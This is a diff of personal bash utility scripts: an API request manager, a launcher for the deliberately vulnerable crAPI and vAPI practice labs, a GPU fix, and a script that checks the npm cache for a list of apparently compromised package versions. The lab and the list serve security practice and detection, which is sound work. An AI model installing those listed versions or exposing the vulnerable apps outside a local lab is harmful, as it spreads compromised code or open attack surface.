||||||
|
if head -1 "$response_file" | jq empty 2>/dev/null; then
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}${CYAN}JSON Response:${NC}"
|
||||||
|
head -n -3 "$response_file" | jq .
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# List saved requests
|
||||||
|
list_requests() {
|
||||||
|
if [[ ! -d "$REQUESTS_DIR" ]] || [[ -z "$(ls -A "$REQUESTS_DIR" 2>/dev/null)" ]]; then
|
||||||
|
echo -e "${YELLOW}No saved requests${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Saved Requests:${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
for file in "$REQUESTS_DIR"/*.sh; do
|
||||||
|
name=$(basename "$file" .sh)
|
||||||
|
method=$(grep -oP 'POST|GET|PUT|DELETE|PATCH' "$file" | head -1 || echo "?")
|
||||||
|
url=$(grep -oP 'https?://[^\s"]+' "$file" | head -1 || echo "?")
|
||||||
|
|
||||||
|
printf " %-20s ${CYAN}%-7s${NC} %s\n" "$name" "$method" "$url"
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show request details
|
||||||
|
show_request() {
|
||||||
|
local name=$1
|
||||||
|
local request_file="$REQUESTS_DIR/$name.sh"
|
||||||
|
|
||||||
|
if [[ ! -f "$request_file" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Request: $name${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
# Use bat if available for syntax highlighting
|
||||||
|
if command -v bat &>/dev/null; then
|
||||||
|
bat "$request_file"
|
||||||
|
else
|
||||||
|
cat "$request_file"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Delete request
|
||||||
|
delete_request() {
|
||||||
|
local name=$1
|
||||||
|
local request_file="$REQUESTS_DIR/$name.sh"
|
||||||
|
|
||||||
|
if [[ ! -f "$request_file" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -n "Delete request '$name'? (y/N) "
|
||||||
|
read -r response
|
||||||
|
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||||
|
rm "$request_file"
|
||||||
|
echo -e "${GREEN}✓${NC} Deleted: $name"
|
||||||
|
else
|
||||||
|
echo "Cancelled"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show response history
|
||||||
|
show_history() {
|
||||||
|
local name=$1
|
||||||
|
|
||||||
|
responses=$(find "$RESPONSES_DIR" -name "${name}_*.txt" 2>/dev/null | sort -r)
|
||||||
|
|
||||||
|
if [[ -z "$responses" ]]; then
|
||||||
|
echo -e "${YELLOW}No response history for: $name${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Response History: $name${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
echo "$responses" | while read -r file; do
|
||||||
|
timestamp=$(basename "$file" | sed "s/${name}_//" | sed 's/.txt//')
|
||||||
|
status=$(tail -3 "$file" | grep "Status:" | awk '{print $2}')
|
||||||
|
time=$(tail -3 "$file" | grep "Time:" | awk '{print $2}')
|
||||||
|
|
||||||
|
# Color status
|
||||||
|
if [[ "$status" =~ ^2 ]]; then
|
||||||
|
status_colored="${GREEN}$status${NC}"
|
||||||
|
elif [[ "$status" =~ ^4 ]]; then
|
||||||
|
status_colored="${YELLOW}$status${NC}"
|
||||||
|
elif [[ "$status" =~ ^5 ]]; then
|
||||||
|
status_colored="${RED}$status${NC}"
|
||||||
|
else
|
||||||
|
status_colored="$status"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e " $timestamp - Status: $status_colored - Time: $time"
|
||||||
|
done
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${CYAN}Tip:${NC} Use 'api diff $name' to compare last two responses"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Diff last two responses
|
||||||
|
diff_responses() {
|
||||||
|
local name=$1
|
||||||
|
|
||||||
|
responses=$(find "$RESPONSES_DIR" -name "${name}_*.txt" 2>/dev/null | sort -r | head -2)
|
||||||
|
count=$(echo "$responses" | wc -l)
|
||||||
|
|
||||||
|
if [[ $count -lt 2 ]]; then
|
||||||
|
echo -e "${YELLOW}Need at least 2 responses to diff${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
file1=$(echo "$responses" | sed -n 1p)
|
||||||
|
file2=$(echo "$responses" | sed -n 2p)
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Diff: $name${NC}"
|
||||||
|
echo -e "${CYAN}Latest:${NC} $(basename "$file1")"
|
||||||
|
echo -e "${CYAN}Previous:${NC} $(basename "$file2")"
|
||||||
|
echo
|
||||||
|
|
||||||
|
# Remove status/time lines before diff
|
||||||
|
diff -u <(head -n -3 "$file2") <(head -n -3 "$file1") || true
|
||||||
|
}
|
||||||
|
|
||||||
|
# Token management
|
||||||
|
manage_token() {
|
||||||
|
local action=$1
|
||||||
|
shift
|
||||||
|
|
||||||
|
case "$action" in
|
||||||
|
set)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api token set KEY VALUE" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
key=$1
|
||||||
|
value=$2
|
||||||
|
|
||||||
|
# Update JSON file
|
||||||
|
if command -v jq &>/dev/null; then
|
||||||
|
jq --arg k "$key" --arg v "$value" '. + {($k): $v}' "$TOKENS_FILE" > "$TOKENS_FILE.tmp"
|
||||||
|
mv "$TOKENS_FILE.tmp" "$TOKENS_FILE"
|
||||||
|
echo -e "${GREEN}✓${NC} Token saved: $key"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} jq required for token management" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
get)
|
||||||
|
if [[ $# -lt 1 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api token get KEY" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
key=$1
|
||||||
|
|
||||||
|
if command -v jq &>/dev/null; then
|
||||||
|
value=$(jq -r ".$key // empty" "$TOKENS_FILE")
|
||||||
|
if [[ -n "$value" ]]; then
|
||||||
|
echo "$value"
|
||||||
|
else
|
||||||
|
echo -e "${YELLOW}Token not found: $key${NC}" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
list)
|
||||||
|
if command -v jq &>/dev/null; then
|
||||||
|
echo -e "${BOLD}${CYAN}Saved Tokens:${NC}"
|
||||||
|
jq -r 'keys[]' "$TOKENS_FILE"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown token action: $action" >&2
|
||||||
|
echo "Use: set, get, list" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Export request
|
||||||
|
export_request() {
|
||||||
|
local name=$1
|
||||||
|
local format=${2:-curl}
|
||||||
|
local request_file="$REQUESTS_DIR/$name.sh"
|
||||||
|
|
||||||
|
if [[ ! -f "$request_file" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$format" in
|
||||||
|
curl)
|
||||||
|
# Extract the curl command
|
||||||
|
grep -A 999 'curl' "$request_file" | grep -v '^#'
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown format: $format" >&2
|
||||||
|
echo "Supported: curl" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Initialize
|
||||||
|
init_api
|
||||||
|
|
||||||
|
# Parse command
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
-h|--help|help)
|
||||||
|
show_help
|
||||||
|
;;
|
||||||
|
save)
|
||||||
|
if [[ $# -lt 3 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api save NAME CURL_ARGS" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
shift
|
||||||
|
save_request "$@"
|
||||||
|
;;
|
||||||
|
run)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api run NAME [VARS]" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
shift
|
||||||
|
run_request "$@"
|
||||||
|
;;
|
||||||
|
list|ls)
|
||||||
|
list_requests
|
||||||
|
;;
|
||||||
|
show)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api show NAME" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
show_request "$2"
|
||||||
|
;;
|
||||||
|
delete|rm)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api delete NAME" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
delete_request "$2"
|
||||||
|
;;
|
||||||
|
history)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api history NAME" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
show_history "$2"
|
||||||
|
;;
|
||||||
|
diff)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api diff NAME" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
diff_responses "$2"
|
||||||
|
;;
|
||||||
|
token)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api token <set|get|list> ..." >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
shift
|
||||||
|
manage_token "$@"
|
||||||
|
;;
|
||||||
|
export)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: api export NAME [FORMAT]" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
export_request "$2" "${3:-curl}"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $1" >&2
|
||||||
|
echo "Run 'api --help' for usage" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
241
scripts/api-lab
Executable file
241
scripts/api-lab
Executable file
|
|
@ -0,0 +1,241 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: api-lab
|
||||||
|
# Description: Quick launcher for API testing vulnerable apps (crAPI and vAPI)
|
||||||
|
# Usage: api-lab start|stop|status|logs
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
LAB_DIR="$HOME/api-lab"
|
||||||
|
CRAPI_DIR="$LAB_DIR/crapi"
|
||||||
|
VAPI_DIR="$LAB_DIR/vapi"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}api-lab${NC} - API Testing Lab Manager v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " api-lab <command> [app]"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}start [app]${NC} Start lab containers (crapi, vapi, or both)"
|
||||||
|
echo -e " ${CYAN}stop [app]${NC} Stop lab containers"
|
||||||
|
echo -e " ${CYAN}status${NC} Show running containers"
|
||||||
|
echo -e " ${CYAN}logs [app]${NC} Show container logs"
|
||||||
|
echo -e " ${CYAN}setup${NC} Initial lab setup (clone repos)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}APPS:${NC}"
|
||||||
|
echo -e " ${YELLOW}crapi${NC} - Completely Ridiculous API (OWASP)"
|
||||||
|
echo -e " ${YELLOW}vapi${NC} - Vulnerable API"
|
||||||
|
echo -e " ${YELLOW}both${NC} - Start/stop both apps (default)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " api-lab start # Start both labs"
|
||||||
|
echo " api-lab start crapi # Start only crAPI"
|
||||||
|
echo " api-lab stop # Stop both labs"
|
||||||
|
echo " api-lab status # Check what's running"
|
||||||
|
echo " api-lab logs vapi # View vAPI logs"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}URLS:${NC}"
|
||||||
|
echo " crAPI: http://127.0.0.1:8888"
|
||||||
|
echo " Mailhog: http://127.0.0.1:8025"
|
||||||
|
echo " vAPI: http://127.0.0.1/vapi"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check if docker is available
|
||||||
|
check_docker() {
|
||||||
|
if ! command -v docker &>/dev/null; then
|
||||||
|
echo -e "${RED}Error:${NC} Docker not installed"
|
||||||
|
echo "Install: sudo apt install docker.io docker-compose"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Setup lab directories
|
||||||
|
setup_lab() {
|
||||||
|
echo -e "${CYAN}[*]${NC} Setting up API testing lab..."
|
||||||
|
|
||||||
|
mkdir -p "$LAB_DIR"
|
||||||
|
|
||||||
|
# crAPI
|
||||||
|
if [[ ! -d "$CRAPI_DIR" ]]; then
|
||||||
|
echo -e "${YELLOW}[*]${NC} Setting up crAPI..."
|
||||||
|
mkdir -p "$CRAPI_DIR"
|
||||||
|
cd "$CRAPI_DIR"
|
||||||
|
curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml
|
||||||
|
sudo docker-compose pull
|
||||||
|
echo -e "${GREEN}✓${NC} crAPI setup complete"
|
||||||
|
else
|
||||||
|
echo -e "${GREEN}✓${NC} crAPI already exists"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# vAPI
|
||||||
|
if [[ ! -d "$VAPI_DIR" ]]; then
|
||||||
|
echo -e "${YELLOW}[*]${NC} Setting up vAPI..."
|
||||||
|
cd "$LAB_DIR"
|
||||||
|
git clone https://github.com/roottusk/vapi.git
|
||||||
|
cd "$VAPI_DIR"
|
||||||
|
sudo docker-compose pull
|
||||||
|
echo -e "${GREEN}✓${NC} vAPI setup complete"
|
||||||
|
else
|
||||||
|
echo -e "${GREEN}✓${NC} vAPI already exists"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Lab setup complete!"
|
||||||
|
echo -e "${CYAN}[*]${NC} Run: ${BOLD}api-lab start${NC} to launch"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Start containers
|
||||||
|
start_lab() {
|
||||||
|
local app="${1:-both}"
|
||||||
|
|
||||||
|
case "$app" in
|
||||||
|
crapi)
|
||||||
|
if [[ ! -d "$CRAPI_DIR" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} crAPI not set up. Run: api-lab setup"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting crAPI..."
|
||||||
|
cd "$CRAPI_DIR"
|
||||||
|
sudo docker-compose -f docker-compose.yml --compatibility up -d
|
||||||
|
echo -e "${GREEN}✓${NC} crAPI started"
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1:8888${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Mailhog at: ${BOLD}http://127.0.0.1:8025${NC}"
|
||||||
|
;;
|
||||||
|
|
||||||
|
vapi)
|
||||||
|
if [[ ! -d "$VAPI_DIR" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} vAPI not set up. Run: api-lab setup"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting vAPI..."
|
||||||
|
cd "$VAPI_DIR"
|
||||||
|
sudo docker-compose up -d
|
||||||
|
echo -e "${GREEN}✓${NC} vAPI started"
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1/vapi${NC}"
|
||||||
|
;;
|
||||||
|
|
||||||
|
both|all)
|
||||||
|
start_lab crapi
|
||||||
|
echo
|
||||||
|
start_lab vapi
|
||||||
|
;;
|
||||||
|
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||||
|
echo "Valid options: crapi, vapi, both"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Stop containers
|
||||||
|
stop_lab() {
|
||||||
|
local app="${1:-both}"
|
||||||
|
|
||||||
|
case "$app" in
|
||||||
|
crapi)
|
||||||
|
if [[ -d "$CRAPI_DIR" ]]; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Stopping crAPI..."
|
||||||
|
cd "$CRAPI_DIR"
|
||||||
|
sudo docker-compose stop
|
||||||
|
echo -e "${GREEN}✓${NC} crAPI stopped"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
vapi)
|
||||||
|
if [[ -d "$VAPI_DIR" ]]; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Stopping vAPI..."
|
||||||
|
cd "$VAPI_DIR"
|
||||||
|
sudo docker-compose stop
|
||||||
|
echo -e "${GREEN}✓${NC} vAPI stopped"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
both|all)
|
||||||
|
stop_lab crapi
|
||||||
|
stop_lab vapi
|
||||||
|
;;
|
||||||
|
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show status
|
||||||
|
show_status() {
|
||||||
|
echo -e "${BOLD}${CYAN}API Lab Status:${NC}"
|
||||||
|
echo
|
||||||
|
sudo docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|crapi|vapi)" || echo "No lab containers running"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show logs
|
||||||
|
show_logs() {
|
||||||
|
local app="${1:-}"
|
||||||
|
|
||||||
|
if [[ -z "$app" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Specify app: crapi or vapi"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$app" in
|
||||||
|
crapi)
|
||||||
|
cd "$CRAPI_DIR"
|
||||||
|
sudo docker-compose logs -f
|
||||||
|
;;
|
||||||
|
vapi)
|
||||||
|
cd "$VAPI_DIR"
|
||||||
|
sudo docker-compose logs -f
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main
|
||||||
|
check_docker
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
command="$1"
|
||||||
|
shift
|
||||||
|
|
||||||
|
case "$command" in
|
||||||
|
setup|install)
|
||||||
|
setup_lab
|
||||||
|
;;
|
||||||
|
start|up)
|
||||||
|
start_lab "${1:-both}"
|
||||||
|
;;
|
||||||
|
stop|down)
|
||||||
|
stop_lab "${1:-both}"
|
||||||
|
;;
|
||||||
|
status|ps)
|
||||||
|
show_status
|
||||||
|
;;
|
||||||
|
logs)
|
||||||
|
show_logs "${1:-}"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $command"
|
||||||
|
echo "Run 'api-lab --help' for usage"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
22
scripts/apply-gpu-fix.sh
Executable file
22
scripts/apply-gpu-fix.sh
Executable file
|
|
@ -0,0 +1,22 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Apply AMD GPU power management fix for Pop!_OS 22.04
|
||||||
|
|
||||||
|
echo "Creating AMD GPU configuration..."
|
||||||
|
sudo bash -c 'cat > /etc/modprobe.d/amdgpu.conf << EOFINNER
|
||||||
|
# Disable aggressive power management for AMD Phoenix GPU
|
||||||
|
# Temporary fix until Pop!_OS 24.04 stable (Dec 11, 2025)
|
||||||
|
options amdgpu ppfeaturemask=0x0
|
||||||
|
options amdgpu dpm=0
|
||||||
|
EOFINNER'
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "Verifying configuration was created..."
|
||||||
|
cat /etc/modprobe.d/amdgpu.conf
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "Rebuilding initramfs..."
|
||||||
|
sudo update-initramfs -u
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "✅ Fix applied! Please reboot now:"
|
||||||
|
echo " sudo reboot"
|
||||||
37
scripts/catbin
Executable file
37
scripts/catbin
Executable file
|
|
@ -0,0 +1,37 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: catbin
|
||||||
|
# Description: Display source code of executables in PATH (security auditing!)
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||||
|
# Usage: catbin httpstatus # see what the httpstatus script does
|
||||||
|
# catbin tryna # audit the tryna script
|
||||||
|
# catbin ls # won't work for binaries, only scripts
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
echo "Usage: catbin <command-name>" >&2
|
||||||
|
echo "Example: catbin httpstatus" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
cmd_path=$(command -v "$1" 2>/dev/null || true)
|
||||||
|
|
||||||
|
if [[ -z "$cmd_path" ]]; then
|
||||||
|
echo "Command not found: $1" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check if it's a text file (script) or binary
|
||||||
|
if file "$cmd_path" | grep -q "text"; then
|
||||||
|
# Use bat if available for syntax highlighting
|
||||||
|
if command -v bat &>/dev/null; then
|
||||||
|
bat "$cmd_path"
|
||||||
|
else
|
||||||
|
cat "$cmd_path"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo "Error: $cmd_path is a binary, not a script" >&2
|
||||||
|
echo "File type: $(file "$cmd_path")" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
56
scripts/check-npm-cache.sh
Executable file
56
scripts/check-npm-cache.sh
Executable file
|
|
@ -0,0 +1,56 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
packages_json='[
|
||||||
|
{"name":"backslash","version":"0.2.1"},
|
||||||
|
{"name":"chalk-template","version":"1.1.1"},
|
||||||
|
{"name":"supports-hyperlinks","version":"4.1.1"},
|
||||||
|
{"name":"has-ansi","version":"6.0.1"},
|
||||||
|
{"name":"simple-swizzle","version":"0.2.3"},
|
||||||
|
{"name":"color-string","version":"2.1.1"},
|
||||||
|
{"name":"error-ex","version":"1.3.3"},
|
||||||
|
{"name":"color-name","version":"2.0.1"},
|
||||||
|
{"name":"is-arrayish","version":"0.3.3"},
|
||||||
|
{"name":"slice-ansi","version":"7.1.1"},
|
||||||
|
{"name":"color-convert","version":"3.1.1"},
|
||||||
|
{"name":"wrap-ansi","version":"9.0.1"},
|
||||||
|
{"name":"ansi-regex","version":"6.2.1"},
|
||||||
|
{"name":"supports-color","version":"10.2.1"},
|
||||||
|
{"name":"strip-ansi","version":"7.1.1"},
|
||||||
|
{"name":"chalk","version":"5.6.1"},
|
||||||
|
{"name":"debug","version":"4.4.2"},
|
||||||
|
{"name":"ansi-styles","version":"6.2.2"},
|
||||||
|
{"name":"proto-tinker-wc","version":"0.1.87"},
|
||||||
|
{"name":"duckdb","version":"1.3.3"},
|
||||||
|
{"name":"@duckdb/node-api","version":"1.3.3"},
|
||||||
|
{"name":"@duckdb/node-bindings","version":"1.3.3"}
|
||||||
|
]'
|
||||||
|
|
||||||
|
if ! command -v jq >/dev/null 2>&1; then
|
||||||
|
echo "Error: 'jq' is required (to parse the JSON array-of-objects)."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
names=$(printf '%s\n' "$packages_json" | jq -r '.[].name' | tr '\n' ' ')
|
||||||
|
|
||||||
|
echo "Running 'npm cache ls' for given packages..."
|
||||||
|
npm_output="$(npm cache ls $names 2>/dev/null || true)"
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo "Packages found in npm cache:"
|
||||||
|
tmpfile=$(mktemp)
|
||||||
|
trap 'rm -f "$tmpfile"' EXIT
|
||||||
|
|
||||||
|
# loop through package/version
|
||||||
|
printf '%s\n' "$packages_json" | jq -r '.[] | "\(.name)\t\(.version)"' | \
|
||||||
|
while IFS=$'\t' read -r name version; do
|
||||||
|
if [ -n "$name" ] && printf '%s\n' "$npm_output" | grep -q "${name}-${version}"; then
|
||||||
|
echo "• $name@$version"
|
||||||
|
echo 1 >> "$tmpfile"
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
if ! grep -q 1 "$tmpfile"; then
|
||||||
|
echo "(none)"
|
||||||
|
fi
|
||||||
|
|
||||||
18
scripts/cht.sh
Executable file
18
scripts/cht.sh
Executable file
|
|
@ -0,0 +1,18 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Primagean cht.sh
|
||||||
|
# tmux + cht.sh + fzf
|
||||||
|
|
||||||
|
languages=`echo "golang lua cpp c typescript nodejs" | tr ' ' '\n'`
|
||||||
|
core_utils=`echo "xargs find mv sed awk" | tr ' ' '\n'`
|
||||||
|
|
||||||
|
selected=`printf "$languages\n$core_utils" | fzf`
|
||||||
|
read -p "query: " query
|
||||||
|
|
||||||
|
if printf $languages | grep -qs $selected; then
|
||||||
|
tmux neww bash -c "curl cht.sh/$selected/`echo $query | tr ' ' '+'` & while [ : ]; do sleep 1; done"
|
||||||
|
else
|
||||||
|
tmux neww bash -c "curl cht.sh/$selected~$query & while [ : ]; do sleep 1; done"
|
||||||
|
fi
|
||||||
|
|
||||||
|
|
||||||
528
scripts/clip
Executable file
528
scripts/clip
Executable file
|
|
@ -0,0 +1,528 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: clip
|
||||||
|
# Description: Smart clipboard manager with history, search, and categories
|
||||||
|
# Usage: clip # Show history with fzf search
|
||||||
|
# clip pin # Pin current clipboard item
|
||||||
|
# clip cat 5 # Show 5th history item
|
||||||
|
# clip search "192" # Search history
|
||||||
|
# clip clear # Clear history
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
CLIP_DIR="$HOME/.clipboard"
|
||||||
|
HISTORY_FILE="$CLIP_DIR/history.txt"
|
||||||
|
PINS_FILE="$CLIP_DIR/pins.txt"
|
||||||
|
MAX_HISTORY=100
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Initialize clip directory
|
||||||
|
init_clip() {
|
||||||
|
if [[ ! -d "$CLIP_DIR" ]]; then
|
||||||
|
mkdir -p "$CLIP_DIR"
|
||||||
|
touch "$HISTORY_FILE"
|
||||||
|
touch "$PINS_FILE"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}clip${NC} - Smart Clipboard Manager v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " clip [COMMAND]"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}(no args)${NC} Show history with fzf search"
|
||||||
|
echo -e " ${CYAN}pin${NC} Pin current clipboard item"
|
||||||
|
echo -e " ${CYAN}pins${NC} Show pinned items"
|
||||||
|
echo -e " ${CYAN}cat N${NC} Show Nth history item"
|
||||||
|
echo -e " ${CYAN}search TERM${NC} Search history"
|
||||||
|
echo -e " ${CYAN}list${NC} List recent history (last 20)"
|
||||||
|
echo -e " ${CYAN}save${NC} Save current clipboard to history"
|
||||||
|
echo -e " ${CYAN}clear${NC} Clear history"
|
||||||
|
